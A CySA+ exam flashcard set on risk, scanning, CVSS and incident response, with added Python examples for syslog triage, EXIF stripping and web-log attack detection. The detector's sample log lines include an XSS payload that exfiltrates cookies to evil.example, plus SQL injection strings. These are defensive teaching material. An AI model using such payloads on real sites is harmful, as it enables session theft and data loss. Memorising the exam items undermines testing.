
CySA Exam


Which one of the following objectives is not one of the three main objectives that information security professionals must achieve to protect their organizations against cybersecurity threats?
nonrepudiation
Tommy is assessing the security of the database servers in his datacenter and realizes that one of them is missing a critical Oracle security patch. What type of situation has Tommy detected?
vulnerability
Ben is preparing to conduct a cybersecurity risk assessment for his organization. If he chooses to follow the standard process proposed by NIST, which one of the following steps would come first?
Identify threats
Cindy is conducting a cybersecurity risk assessment and is considering the impact that a failure of her city's power grid might have on the organization. What type of threat is she considering?
environmental
Which one of the following categories of threat requires that cybersecurity analysts consider the capability, intent and targeting of the threat source?
adversarial
Vincent is responding to a security incident that compromised one of his organization's web servers. He does not believe that the attackers modified or stole any information, but they did disrupt access to the organization's website. What cybersecurity objective did this attack violate?
availability
Which one of the following is an example of an operational security control?
penetration tests
Encryption software, network firewalls, and antivirus software are all examples of _________________ security controls.
technical
Paul recently completed a risk assessment and determined that his network was vulnerable to hackers connecting to open ports on servers. He implemented a network firewall to reduce the likelihood of a successful attack. What risk management strategy did Paul choose to pursue?
risk mitigation
Robert's organization has a BYOD policy, and he would like to ensure that devices connected to the network under this policy have current antivirus software. What technology can best assist him with this goal?
network access control
When performing 802.1x authentication, what protocol does the authenticator use to communicate with the authentication server?
RADIUS
Juan is configuring a new device that will join his organization's wireless network. The wireless network uses 802.1x authentication. What type of agent must be running on the device for it to join this network?
802.1x supplicant
Rick is preparing a firewall rule that will allow network traffic from external systems to a web server running the HTTPS protocol. What TCP port must he allow to pass through the firewall?
443
What type of firewall provides the greatest degree of contextual information and can include information about users and applications in its decision-making process?
next-generation firewall (NGFW)
Wayne is configuring a jump box server that system administrators will connect to from their laptops. Which port should definitely not be open on the jump box?
23
Tom would like to deploy consistent security settings to all of his Windows systems simultaneously. What technology can he use to achieve this goal?
group policy object
During what phase of a penetration test should the testers obtain written authorization to conduct the test?
planning
Which step occurs first during the attack phase of a penetration test?
gaining access
Barry is participating in a cybersecurity wargame exercise. His role is to attempt to break into adversary systems. What team is he on?
red
Which one of the following techniques might be used to automatically detect and block malicious software that does not match known malware signatures?
sandboxing
Kevin would like to implement a specialized firewall that can protect against SQL injection, cross-site scripting, and similar attacks. What technology should he choose?
WAF
What method is used to replicate DNS information for DNS servers but is also a tempting exploit target for attackers?
zone transfers
____________ is a suite of DNS security specifications.
DNSSEC
What flag does nmap use to enable operating system identification?
-O (uppercase letter O; the lowercase -o prefix selects output formats such as -oN and -oX)
What command line tool can be used to determine the path that traffic takes to a remote system?
traceroute
Traceroute is a command-line tool that uses __________ to trace the route that a packet takes to a host.
ICMP (this is how Windows tracert probes; the classic Unix traceroute sends UDP probes by default and uses ICMP echo only with -I, but both map each hop from the ICMP Time Exceeded replies)
What type of data can frequently be gathered from images taken on smartphones?
EXIF
EXIF (Exchangeable Image File Format) data often includes ________________, allowing the images to be mapped and identified to a specific device or type of camera.
location and camera data
Which Cisco log level is the most critical?
0
Which Cisco log level is used for debugging information and is at the bottom of the scale?
7
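The two Cisco log-level cards above are easy to get backwards: the severity number is embedded in every IOS message tag as %FACILITY-SEVERITY-MNEMONIC, and a smaller number is more critical. The following is an added example, not part of the original set, that parses that tag out of collector-style syslog lines, ranks the most critical messages first and counts messages per level. The log lines are constructed for the example and the mnemonics in them are illustrative, not quoted from a device.

```python
import re
from collections import Counter

# Cisco IOS severity levels: 0 is the most critical, 7 (debugging) the least.
SEVERITY_NAMES = {
    0: "emergencies", 1: "alerts", 2: "critical", 3: "errors",
    4: "warnings", 5: "notifications", 6: "informational", 7: "debugging",
}

# Cisco IOS messages carry the level inside their %FACILITY-SEVERITY-MNEMONIC tag;
# whatever syslog transport header precedes the tag is ignored here.
CISCO_TAG = re.compile(
    r"%(?P<facility>[A-Z0-9_]+)-(?P<severity>[0-7])-(?P<mnemonic>[A-Z0-9_]+):\s*(?P<text>.*)"
)

def parse_cisco_line(line):
    """Return (facility, severity, mnemonic, text), or None when the line has no Cisco tag."""
    m = CISCO_TAG.search(line)
    if m is None:
        return None
    return (m.group("facility"), int(m.group("severity")), m.group("mnemonic"), m.group("text"))

def triage(lines, max_severity=3):
    """Keep messages at or below max_severity (0-3 = emergencies through errors),
    ordered most critical first. 'At or below' means a smaller number here."""
    parsed = (parse_cisco_line(line) for line in lines)
    hits = [p for p in parsed if p is not None and p[1] <= max_severity]
    return sorted(hits, key=lambda p: p[1])

def severity_histogram(lines):
    """Count messages per severity name; a device left at level 7 shows up as a
    pile of 'debugging' entries flooding the collector."""
    parsed = (parse_cisco_line(line) for line in lines)
    return Counter(SEVERITY_NAMES[p[1]] for p in parsed if p is not None)

# Constructed sample lines in the shape a syslog collector stores them (not from a real device).
SAMPLE_LOG = [
    "Mar 10 12:00:01 rtr1 105: %SYS-5-CONFIG_I: Configured from console by admin on vty0 (10.0.0.5)",
    "Mar 10 12:00:09 rtr1 106: %LINK-3-UPDOWN: Interface GigabitEthernet0/1, changed state to down",
    "Mar 10 12:01:30 rtr1 107: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: root] [Source: 203.0.113.9]",
    "Mar 10 12:02:00 rtr1 108: %SYS-2-MALLOCFAIL: Memory allocation of 65536 bytes failed",
    "Mar 10 12:02:10 rtr1 109: %IP-7-PACKET_DEBUG: ICMP echo request from 10.0.0.5 to 10.0.0.1",
    "Mar 10 12:02:11 rtr1 sshd[412]: Accepted publickey for admin from 10.0.0.5",
]

if __name__ == "__main__":
    for facility, sev, mnemonic, text in triage(SAMPLE_LOG):
        print(f"[{sev} {SEVERITY_NAMES[sev]}] %{facility}-{sev}-{mnemonic}: {text}")
    print(severity_histogram(SAMPLE_LOG))
```

Running it lists the level-2 MALLOCFAIL before the level-3 link-down message and leaves the non-Cisco sshd line out entirely; lowering max_severity to 0 would keep only emergencies.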
During passive intelligence gathering, you are able to run netstat on a workstation located at your target's headquarters. What information would you not be able to find using netstat on a Windows system?
Active IPX connections
Active TCP connections and the executables that are associated with them, and route table information are all available via ____________.
Netstat
Which type of Windows log is most likely to contain information about a file being deleted?
security logs
What organization manages the global IP address space?
IANA
Before Ben sends a Word document, he uses the built-in Document Inspector to verify that the file does not contain hidden content. What is this process called?
metadata purging
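The EXIF and metadata-purging cards above describe what is stored and why it should be removed, but not how it is laid out. The following is an added example, not part of the original set: it constructs a minimal TIFF/EXIF blob (a Model tag plus a GPS sub-IFD with N/W references and degree/minute/second rationals), parses the coordinates back into signed decimal degrees, wraps the blob in a toy JPEG, and purges the APP1/Exif segment while leaving every other segment byte-identical. The image bytes are constructed for the example; the tag numbers and layout are those of the EXIF/TIFF format itself.

```python
import struct

# TIFF/EXIF tag and type numbers used below (little-endian "II" byte order).
TAG_MODEL, TAG_GPS_IFD = 0x0110, 0x8825
GPS_LAT_REF, GPS_LAT, GPS_LON_REF, GPS_LON = 1, 2, 3, 4
TYPE_SIZES = {1: 1, 2: 1, 3: 2, 4: 4, 5: 8}   # BYTE, ASCII, SHORT, LONG, RATIONAL

def _ifd_size(n_entries):
    return 2 + 12 * n_entries + 4            # entry count, 12-byte entries, next-IFD pointer

def build_sample_exif():
    """Construct (not captured) a minimal EXIF/TIFF blob: IFD0 with Model and a GPS IFD pointer."""
    model = b"Example Phone\x00"
    ifd0_off = 8
    model_off = ifd0_off + _ifd_size(2)
    gps_off = model_off + len(model)
    lat_off = gps_off + _ifd_size(4)
    lon_off = lat_off + 24                   # three RATIONALs of 8 bytes each

    def entry(tag, typ, count, value4):      # value4: 4-byte inline value or offset
        return struct.pack("<HHI", tag, typ, count) + value4

    def dms(deg, minutes, seconds):          # numerator/denominator pairs
        return struct.pack("<6I", deg, 1, minutes, 1, int(seconds * 100), 100)

    ifd0 = (struct.pack("<H", 2)
            + entry(TAG_MODEL, 2, len(model), struct.pack("<I", model_off))
            + entry(TAG_GPS_IFD, 4, 1, struct.pack("<I", gps_off))
            + struct.pack("<I", 0))
    gps = (struct.pack("<H", 4)
           + entry(GPS_LAT_REF, 2, 2, b"N\x00\x00\x00")
           + entry(GPS_LAT, 5, 3, struct.pack("<I", lat_off))
           + entry(GPS_LON_REF, 2, 2, b"W\x00\x00\x00")
           + entry(GPS_LON, 5, 3, struct.pack("<I", lon_off))
           + struct.pack("<I", 0))
    return (b"II" + struct.pack("<HI", 42, ifd0_off) + ifd0 + model + gps
            + dms(37, 46, 30.0) + dms(122, 25, 9.0))

def _read_ifd(tiff, off, e):
    """Return {tag: (type, count, raw 4-byte value field)} for the IFD at offset off."""
    n = struct.unpack_from(e + "H", tiff, off)[0]
    entries = {}
    for i in range(n):
        base = off + 2 + 12 * i
        tag, typ, count = struct.unpack_from(e + "HHI", tiff, base)
        entries[tag] = (typ, count, tiff[base + 8:base + 12])
    return entries

def _value(tiff, e, typ, count, raw):
    total = TYPE_SIZES[typ] * count            # values over 4 bytes live at an offset
    data = raw[:total] if total <= 4 else tiff[struct.unpack(e + "I", raw)[0]:][:total]
    if typ == 2:
        return data.rstrip(b"\x00").decode("ascii")
    if typ == 4:
        return list(struct.unpack(e + f"{count}I", data))
    if typ == 5:
        nums = struct.unpack(e + f"{2 * count}I", data)
        return [nums[i] / nums[i + 1] for i in range(0, len(nums), 2)]
    return data

def extract_gps(tiff):
    """Return {'model', 'lat', 'lon'} from a TIFF/EXIF blob, lat/lon as signed decimal degrees."""
    e = "<" if tiff[:2] == b"II" else ">"
    ifd0 = _read_ifd(tiff, struct.unpack_from(e + "I", tiff, 4)[0], e)
    out = {"model": _value(tiff, e, *ifd0[TAG_MODEL])} if TAG_MODEL in ifd0 else {}
    if TAG_GPS_IFD not in ifd0:
        return out
    gps = _read_ifd(tiff, _value(tiff, e, *ifd0[TAG_GPS_IFD])[0], e)

    def decimal(dms_vals, ref):
        d, m, s = dms_vals
        deg = d + m / 60 + s / 3600
        return -deg if ref in ("S", "W") else deg

    out["lat"] = decimal(_value(tiff, e, *gps[GPS_LAT]), _value(tiff, e, *gps[GPS_LAT_REF]))
    out["lon"] = decimal(_value(tiff, e, *gps[GPS_LON]), _value(tiff, e, *gps[GPS_LON_REF]))
    return out

def wrap_jpeg(tiff):
    """Toy JPEG: SOI, APP1/Exif carrying the blob, one placeholder DQT segment, EOI."""
    app1, dqt = b"Exif\x00\x00" + tiff, b"\x00\x01\x02\x03"
    return (b"\xff\xd8\xff\xe1" + struct.pack(">H", len(app1) + 2) + app1
            + b"\xff\xdb" + struct.pack(">H", len(dqt) + 2) + dqt + b"\xff\xd9")

def jpeg_segments(jpeg):
    """Yield (marker, raw segment) for each length-bearing segment after SOI, stopping at
    SOS (entropy-coded data follows) or EOI; the untouched tail is yielded with marker None."""
    i = 2
    while i + 3 < len(jpeg) and jpeg[i] == 0xFF and jpeg[i + 1] not in (0xD9, 0xDA):
        length = struct.unpack_from(">H", jpeg, i + 2)[0]
        yield jpeg[i + 1], jpeg[i:i + 2 + length]
        i += 2 + length
    yield None, jpeg[i:]

def find_exif(jpeg):
    for marker, seg in jpeg_segments(jpeg):
        if marker == 0xE1 and seg[4:10] == b"Exif\x00\x00":
            return seg[10:]
    return None

def strip_exif(jpeg):
    """Metadata purge: rebuild the file without its APP1/Exif segment."""
    out = bytearray(jpeg[:2])
    for marker, seg in jpeg_segments(jpeg):
        if not (marker == 0xE1 and seg[4:10] == b"Exif\x00\x00"):
            out += seg
    return bytes(out)
```

The parser reads the byte-order mark first because cameras write both "II" and "MM" files; the purge drops only the Exif APP1 segment, so an XMP APP1 or an IPTC APP13 segment would survive and would need the same treatment in a real scrubber.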
What type of analysis is best suited to identify a previously unknown malware package operating on a compromised system?
heuristic analysis
Which of the following is not a common DNS anti-harvesting technique?
registering manually
CAPTCHAs, rate limiting, and blacklisting systems or networks that are gathering data are all common ___________ techniques.
anti-DNS harvesting
The __________ flag indicates a zone transfer in both the dig and host utilities.
axfr
Which of the following is not a reason that penetration testers often perform packet capture while conducting port and vulnerability scanning?
plausible deniability
A ____________ is often used to document work, including the time that a given scan or process occurred, and it can also be used to provide additional data for further analysis.
packet capture
What process uses information such as the way that a system's TCP stack responds to queries, what TCP options it supports, and the initial window size it uses?
OS detection
What tool would you use to capture IP traffic information to provide flow and volume information about a network?
netflow
__________ provides information about local connections, which applications have made them, and other useful local system information.
netstat
What method used to replicate DNS information between DNS servers can also be used to gather large amounts of information about an organization's systems?
zone transfer
Selah believes that an organization she is penetration testing may have exposed information about their systems on their website in the past. What site might help her find an older copy of their website?
The Internet Archive
During an information gathering exercise, Chris is asked to find out detailed personal information about his target's employees. What is frequently the best place to find this information?
social media
Which lookup tool provides information about a domain's registrar and physical location?
Whois
____________ will provide IP address or hostname information.
nslookup
__________ will provide IPv4 and IPv6 information as well as email service information.
host
___________ attempts to identify the path to a remote host as well as the systems along the route.
traceroute
What federal law requires the use of vulnerability scanning on information systems operated by federal government agencies?
FISMA
Gary is the system administrator for a federal agency and is responsible for a variety of information systems. Which systems must be covered by vulnerability scanning programs?
high-, moderate-, and low-impact systems
What tool can administrators use to help identify the systems present on a network prior to conducting vulnerability scans?
asset inventory
The asset inventory supplements automated tools with other information to detect systems present on a network. The asset inventory provides critical information for __________________.
vulnerability scans
Tonya is configuring vulnerability scans for a system that is subject to the PCI DSS compliance standard. What is the minimum frequency with which she must conduct scans?
quarterly
Which is not an example of a vulnerability scanning tool?
snort
QualysGuard, Nessus, and OpenVAS are all examples of ___________________.
vulnerability scanning tools
Bethany is the vulnerability management specialist for a large retail organization. She completed her last PCI DSS compliance scan in March. In April, the organization upgraded their point-of-sale system, and Bethany is preparing to conduct new scans. When must she complete the new scan?
immediately
Renee is configuring her vulnerability management solution to perform credentialed scans of servers on her network. What type of account should she provide to the scanners?
read only
Jason is writing a report about a potential security vulnerability in a software product and wishes to use standardized product names to ensure that other security analysts understand the report. Which SCAP component can Jason turn to for assistance?
Common Platform Enumeration (CPE)
Common Platform Enumeration (CPE) is a ________________ component that provides standardized nomenclature for product names and versions.
SCAP
Bill would like to run an internal vulnerability scan on a system for PCI DSS compliance purposes. Who is authorized to complete one of these scans?
any qualified individual
Which type of organization is the most likely to face a regulatory requirement to conduct vulnerability scans?
government agency
What minimum level of impact must a system have under FISMA before the organization is required to determine what information about the system is discoverable by adversaries?
high
What term describes an organization's willingness to tolerate risk in their computing environment?
risk appetite
If an organization is extremely ____________, it may choose to conduct scans more frequently to minimize the amount of time between when a vulnerability comes into existence and when it is detected by a scan.
risk averse
Which one of the following factors is least likely to impact vulnerability scanning schedules?
staff availability
Barry placed all of his organization's credit card processing systems on an isolated network dedicated to card processing. He has implemented appropriate segmentation controls to limit the scope of PCI DSS to those systems through the use of VLANs and firewalls. When Barry goes to conduct vulnerability scans for PCI DSS compliance purposes, what systems must he scan?
systems on the isolated network
Ryan is planning to conduct a vulnerability scan of a business critical system using dangerous plug-ins. What would be the best approach for the critical scan?
run the scan in a test environment
Which one of the following activities is not part of the vulnerability management life cycle?
reporting
Detection, remediation, and testing are the three life-cycle phases for ____________.
vulnerability management
What approach to vulnerability scanning incorporates information from agents running on the target servers?
continuous monitoring
Continuous monitoring incorporates data from agent-based approaches to vulnerability detection and reports security-related configuration changes to the _______________ platform as soon as they occur, providing the ability to analyze those changes for potential vulnerabilities.
vulnerability management
Brian is seeking to determine the appropriate impact categorization for a federal information system as he plans the vulnerability scanning controls for that system. After consulting management, he discovers that the system contains information that, if disclosed improperly, would have a serious adverse impact on the organization. How should this system be categorized?
moderate impact
Jessica is reading reports from vulnerability scans run by a different part of her organization using different products. She is responsible for assigning remediation resources and is having difficulty prioritizing issues from different sources. What SCAP component can help Jessica with this task?
CVSS
The Common Vulnerability Scoring System (CVSS) provides a standardized approach for measuring and describing the severity of ___________.
security vulnerabilities
Sarah would like to run an external vulnerability scan on a system for PCI DSS compliance purposes. Who is authorized to complete one of the scans?
an approved scanning vendor
Tom is reviewing a vulnerability scan report and finds that one of the servers on his network suffers from an internal IP address disclosure vulnerability. What protocol is likely in use on this network that resulted in this vulnerability?
Network Address Translation (NAT)
A network uses Network Address Translation (NAT) to map public and private IP addresses, but a ______________ inadvertently discloses its private IP address to remote systems.
server
Which one of the CVSS metrics would contain information about the number of times that an attacker must successfully authenticate to execute an attack?
Authentication (Au)
The Authentication metric describes the authentication hurdles an attacker would need to clear to ___________ a vulnerability.
exploit
Which one of the following values for the CVSS access complexity metric would indicate that the specified attack is simplest to exploit?
low
A _____________ access complexity of "low" indicates that exploiting the vulnerability does not require any specialized conditions.
CVSS
Which one of the following values for the confidentiality, integrity, or availability CVSS metric would indicate the potential for total compromise of a system?
complete (C)
What is the most recent version of CVSS that is currently available?
3.0 (at the time this set was written; CVSS v3.1 followed in 2019 and v4.0 in November 2023)
Which one of the following metrics is not included in the calculation of CVSS exploitability score?
vulnerability age
The __________________ is computed using the access vector, access complexity, and authentication metrics.
CVSS exploitability score
Kevin recently identified a new security vulnerability and computed its CVSS base score as 6.5. Which risk would this vulnerability fall into?
high
__________________ with a CVSS score of 6.0 or higher, up to the maximum of 10.0, fall into the high risk category under the scale this set uses. Note that NVD's own CVSS v2 bands put high at 7.0 to 10.0, and CVSS v3.x adds a critical band at 9.0 to 10.0.
Vulnerabilities
Tara recently analyzed the results of a vulnerability scan report and found that a vulnerability reported by the scanner did not exist because the system was actually patched as specified. What type of error occurred?
false positive
Which one of the following is not a common source of information that may be correlated with vulnerability scan results?
database tables
Logs, SIEM reports, and configuration management systems are likely to contain information relevant to assessing a __________________.
vulnerability scan report
Which one of the following operating systems is no longer supported by its vendor and should be avoided on production networks?
Windows Server 2003
In what type of attack does the attacker place more information in a memory location than is allocated for that use?
buffer overflow
The Dirty COW attack is an example of what type of vulnerability?
privilege escalation
In October 2016, security researchers announced the discovery of a Linux kernel vulnerability dubbed Dirty COW. This vulnerability, present in the Linux kernel for nine years, was extremely easy to exploit and provided successful attackers with __________________ of affected systems.
root-level (administrative) control
Which protocol should never be used on a public network?
Telnet
Betty is selecting a transport encryption protocol for use in a new public website she is creating. What protocol would be the best choice?
TLS 1.1 was this set's original answer, the newest option offered at the time; TLS 1.0 and 1.1 have since been deprecated by RFC 8996 (2021), so a new public site should offer only TLS 1.2 or 1.3.
Which one of the following conditions would not result in a certificate warning during a vulnerability scan of a web server?
inclusion of a public encryption key
__________________ are intended to carry public keys, so the presence of a public encryption key would not cause an error during a vulnerability scan of a web server; an untrusted CA, certificate expiration, and a mismatched certificate name would.
Digital certificates
What software component is responsible for enforcing the separation of guest systems in a virtualized infrastructure?
hypervisor
Each host in a __________________ runs a special operating system known as a hypervisor that mediates access to the underlying hardware resources.
virtualized data center
In what type of attack does the attacker seek to gain access to resources assigned to a different virtual machine?
VM escape
__________________ are the most serious issue that can exist in a virtualized environment, particularly when a virtual host runs systems of differing security levels. In an escape attack, the attacker has access to a single virtual host and then manages to leverage that access to intrude on the resources assigned to a different virtual machine.
VM escape vulnerabilities
Which one of the following terms is not typically used to describe the connection of physical devices to a network?
Intrusion detection systems (IDS)
Intrusion detection systems (IDS) are a __________________ used to detect network or host attacks.
security control
The Internet of Things (IoT), supervisory control and data acquisition (SCADA) systems, and industrial control systems (ICS) are all associated with connecting __________________ to a network.
physical world objects
Monica discovers that an attacker posted a message in a web forum that she manages that is attacking users who visit the site. Which one of the following attack types is most likely to have occurred?
cross-site scripting (XSS)
In a __________________, an attacker embeds scripting commands on a website that will later be executed by an unsuspecting visitor accessing the site. The idea is to trick a user visiting a trusted site into executing malicious code placed there by an untrusted third party.
cross-site scripting (XSS) attack
Alan is reviewing web server logs after an attack and finds many records that contain semicolons and apostrophes in queries from end users. What type of attack should he suspect?
SQL injection
In an __________________, the attacker seeks to use a web application to gain access to an underlying database. Semicolons and apostrophes are characteristic of this attack.
SQL injection attack
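The two web-attack cards above tell Alan to suspect SQL injection when he sees semicolons and apostrophes, but a name like O'Reilly also puts an apostrophe in a query string. The following is an added example, not part of the original set: it parses combined-format access log lines, URL-decodes the request target (attackers encode the quotes), and grades each request as clean, weak (only the suspicious characters), sqli (a tautology, stacked statement, UNION or trailing comment) or xss (script tags, event handlers, javascript: URIs, DOM access). The log lines and attack strings are constructed for the example and are not from a real server.

```python
import re
from urllib.parse import unquote_plus

# Combined log format: client, ident, user, [timestamp], "METHOD target PROTO", status, size, ...
ACCESS_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Strong indicators: constructs that almost never occur in legitimate input.
SQLI_STRONG = {
    "tautology": re.compile(r"'\s*(or|and)\s+'?\w*'?\s*=", re.I),
    "stacked":   re.compile(r";\s*(drop|delete|insert|update|select|exec)\b", re.I),
    "union":     re.compile(r"\bunion\b\s+(all\s+)?select\b", re.I),
    "comment":   re.compile(r"(--|#|/\*)\s*$"),
}
XSS_STRONG = {
    "script_tag": re.compile(r"<\s*/?\s*script\b", re.I),
    "event_attr": re.compile(r"\bon[a-z]+\s*=", re.I),
    "js_uri":     re.compile(r"javascript\s*:", re.I),
    "dom_access": re.compile(r"document\.(cookie|location|write)", re.I),
}
# Weak indicators: the characters the card mentions. Alone they also appear in ordinary
# data (O'Reilly, "a;b"), so they only raise a "weak" verdict for a human to review.
WEAK_CHARS = ("'", ";")

def classify(decoded):
    """Return (verdict, indicator names) for a URL-decoded request target."""
    xss = [name for name, rx in XSS_STRONG.items() if rx.search(decoded)]
    sqli = [name for name, rx in SQLI_STRONG.items() if rx.search(decoded)]
    weak = [c for c in WEAK_CHARS if c in decoded]
    if xss:
        return "xss", xss
    if sqli:
        return "sqli", sqli
    if weak:
        return "weak", weak
    return "clean", []

def scan_access_log(lines):
    """Parse each line, decode the target and classify it; unparseable lines are skipped."""
    findings = []
    for line in lines:
        m = ACCESS_LINE.match(line)
        if not m:
            continue
        decoded = unquote_plus(m.group("target"))   # %27 -> ', %3B -> ;, %3C -> <
        verdict, indicators = classify(decoded)
        findings.append({"ip": m.group("ip"), "status": int(m.group("status")),
                         "target": decoded, "verdict": verdict, "indicators": indicators})
    return findings

# Constructed sample lines (not from a real server).
SAMPLE_ACCESS_LOG = [
    '203.0.113.7 - - [10/Mar/2024:12:00:01 +0000] "GET /product?id=42 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Mar/2024:12:00:05 +0000] "GET /product?id=42%27%20OR%20%271%27%3D%271 HTTP/1.1" 500 0 "-" "curl/8.0"',
    '203.0.113.9 - - [10/Mar/2024:12:00:07 +0000] "GET /product?id=42%3B%20DROP%20TABLE%20users%3B-- HTTP/1.1" 500 0 "-" "curl/8.0"',
    '198.51.100.4 - - [10/Mar/2024:12:00:09 +0000] "GET /search?q=%3Cscript%3Edocument.location%3D%27http%3A//evil.example/%27%2Bdocument.cookie%3C/script%3E HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '198.51.100.5 - - [10/Mar/2024:12:00:11 +0000] "GET /search?q=O%27Reilly HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f'{f["verdict"]:5} {f["status"]} {f["ip"]:14} {f["target"]}  {f["indicators"]}')
```

Correlating the verdict with the status code is what turns this into an alert: the two sqli hits above returned 500, which is the back-end database choking on the injected syntax, while the O'Reilly search returned 200 and is almost certainly benign.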
Which one of the following is an example of a computer security incident?
former employee crashes a server
A user accessing a secure file and an administrator changing a file's permission settings are examples of __________________, not security incidents.
security events
During what phase of the incident response process would an organization implement defenses designed to reduce the likelihood of a security event?
Preparation
Organizations should build solid, defense-in-depth approaches to cybersecurity during the preparation phase of the __________________. The controls built during this phase serve to reduce the likelihood and impact of future incidents.
incident response process
Alan is responsible for developing his organization's detection and analysis capabilities. He would like to purchase a system that can combine log records from multiple sources to detect potential security incidents. What type of system is best suited to meet Alan's security objective?
SIEM
A security information and event management (SIEM) system correlates log entries from multiple sources and attempts to identify potential __________________.
security incidents
Ben is working to classify the functional impact of an incident. The incident has disabled email service for approximately 30 percent of his organization's staff. How should Ben classify the functional impact of this incident according to the NIST scale?
medium
According to the NIST scale, the definition of medium functional impact is that the organization has lost the ability to provide a __________________ to a subset of system users.
critical service
According to the NIST scale, assigning a __________________ functional impact is only done when the organization can provide all critical services to all users at diminished efficiency.
low
According to the NIST scale, assigning a __________________ functional impact is only done if a critical service is not available to any users.
high
What phase of the incident response process would include measures designed to limit the damage caused by an ongoing breach?
containment, eradication, and recovery
The __________________ applied during the containment, eradication, and recovery phase are designed to limit the damage caused by an ongoing security incident.
containment protocols
Grace is the CSIRT team leader for a business unit within NASA, a federal agency. What is the minimum amount of time that Grace must retain incident handling records?
three years
Karen is responding to a security incident that resulted from an intruder stealing files from a government agency. Those files contained unencrypted information about protected critical infrastructure. How should Karen rate the information impact of this loss?
proprietary breach
In a proprietary breach, __________________ proprietary information is accessed or exfiltrated.
unclassified
__________________ is an example of unclassified proprietary information.
protected critical infrastructure information (PCII)
Matt is concerned about the fact that log records from his organization contain conflicting timestamps due to unsynchronized clocks. What protocol can he use to synchronize clocks throughout the enterprise?
network time protocol (NTP)
Which one of the following document types would outline the authority of a CSIRT responding to a security incident?
policy
An organization's __________________ should contain a clear description of the authority assigned to the CSIRT while responding to an active security incident.
incident response policy
A cross-site scripting attack is an example of what type of threat vector?
web
A __________________ is an attack executed from a website or web-based application.
web attack
A cross-site scripting (XSS) attack is used to steal credentials or redirect to a site that exploits a browser vulnerability and installs __________________.
malware
Which one of the following parties is not commonly the target of external communications during an incident?
the perpetrator
__________________ members do not normally communicate directly with the perpetrator of a cybersecurity incident.
CSIRT
Robert is finishing a draft of a proposed incident response policy for his organization. Who would be the most appropriate person to sign the policy?
CEO
The __________________ provides the CSIRT with the authority needed to do their job. Therefore, it should be approved by the highest possible level of authority within the organization, preferably the CEO.
incident response policy
Which one of the following is not an objective of the containment, eradication, and recovery phase of incident response?
detect an incident in progress
Implementing a containment strategy, identifying the attackers, and eradicating the effects of an incident are all objectives of the __________________ of incident response.
containment, eradication and recovery phase
Renee is responding to a security incident that resulted in the unavailability of a website critical to her company's operations. She is unsure of the amount of time and effort that it will take to recover the website. How should Renee classify the recoverability effort?
extended
__________________ effort occurs when the time to recovery is unpredictable. In those cases, additional resources and outside help are typically needed.
extended recoverability
Which one of the following is an example of an attrition attack?
brute-force password attack
An __________________ attack employs brute-force methods to compromise, degrade, or destroy systems, networks, or services - for example, a DDoS attack intended to impair or deny access to a service or application or a brute-force attack against an authentication mechanism.
attrition
Who is the best facilitator for a post-incident lessons-learned session?
independent facilitator
__________________ sessions are most effective when facilitated by an independent party who was not involved in the incident response effort.
Lessons-learned
Which one of the following elements is not normally found in an incident response policy?
procedures for rebuilding systems
Procedures for rebuilding systems are highly technical and would normally be included in a playbook or procedure document rather than an __________________.
incident response policy
A man-in-the-middle attack is an example of what type of threat vector?
impersonation
An __________________ involves the replacement of something benign with something malicious - for example, spoofing, man-in-the-middle attacks, rogue wireless access points, and SQL injection attacks.
impersonation attack
Tommy is the CSIRT team leader for his organization and is responding to a newly discovered security incident. What document is most likely to contain step-by-step instructions that he might follow in the early hours of the response effort?
playbook
__________________ playbooks contain detailed step-by-step instructions that guide the early response to a cybersecurity incident.
incident response
Organizations typically have __________________ for high-severity and frequently occurring incident types.
playbooks
Hank is responding to a security event where the CEO of his company had her laptop stolen. The laptop was encrypted but contained sensitive information about the company's employees. How should Hank classify the information impact of this security event?
none
An encrypted laptop containing sensitive information about the company's employees would not qualify as a __________________ with measurable information impact, because encryption was used to protect the contents of the laptop.
security incident
A __________________ determines which clients may access a wired or wireless network.
NAC
A __________________ creates a unique fingerprint of a file.
hash
A __________________ filters network connections based upon source, destination, and port.
firewall
A __________________ is a system intentionally created to appear vulnerable.
honeypot
A __________________ attempts to recover source code from binary code.
decompiler
An __________________ scans a system for malicious software.
antivirus
A __________________ protects against SQL injection attacks.
WAF
A __________________ deploys configuration settings to multiple Windows systems.
GPO
__________________ traces the route packets take to a system.
Traceroute
__________________ identifies open ports and services across a network.
Nmap
__________________ monitors IP traffic flow and volume.
Netflow
__________________ provides organizational contact information associated with domain registration.
Whois
__________________ identifies connections listed by protocol.
Netstat
__________________ performs a zone transfer (query type axfr).
Dig
__________________ is used for packet capture.
Wireshark
__________________ is used for social media geotagging.
Creepy
In CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N, __________________ indicates that an attacker may exploit the vulnerability remotely over a network. This is the most serious value for this metric.
AV:N
In CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N, __________________ indicates that exploiting the vulnerability does not require any specialized conditions. This is the most serious value for this metric.
AC:L
In CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N, __________________ indicates that attackers do not need to authenticate to exploit the vulnerability. This is the most serious value for this metric.
Au:N
In CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N, __________________ indicates that a successful exploitation of this vulnerability would yield partial access to information. This is the middle value for this metric.
C:P
In CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N, __________________ indicates that a successful exploitation of this vulnerability would have no integrity impact. This is the least serious value for this metric.
I:N
In CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N, __________________ indicates that a successful exploitation of this vulnerability would have no availability impact. This is the least serious value for this metric.
A:N
A CVSS vector rating of __________________ indicates that exploiting the vulnerability requires somewhat specialized conditions. This is the middle value for this metric.
AC:M
In the CVSS vector rating, AV stands for:
access vector
In the CVSS vector rating, AC stands for:
access complexity
In the CVSS vector rating, Au stands for:
authentication
In the CVSS vector rating, C stands for:
confidentiality
In the CVSS vector rating, I stands for:
integrity
In the CVSS vector rating, A stands for:
availability
Conducting a lessons-learned review session would occur in the __________________ incident response phase.
post-incident activity
Receiving a report from a staff member about a malware infection would occur in the __________________ incident response phase.
detection and analysis
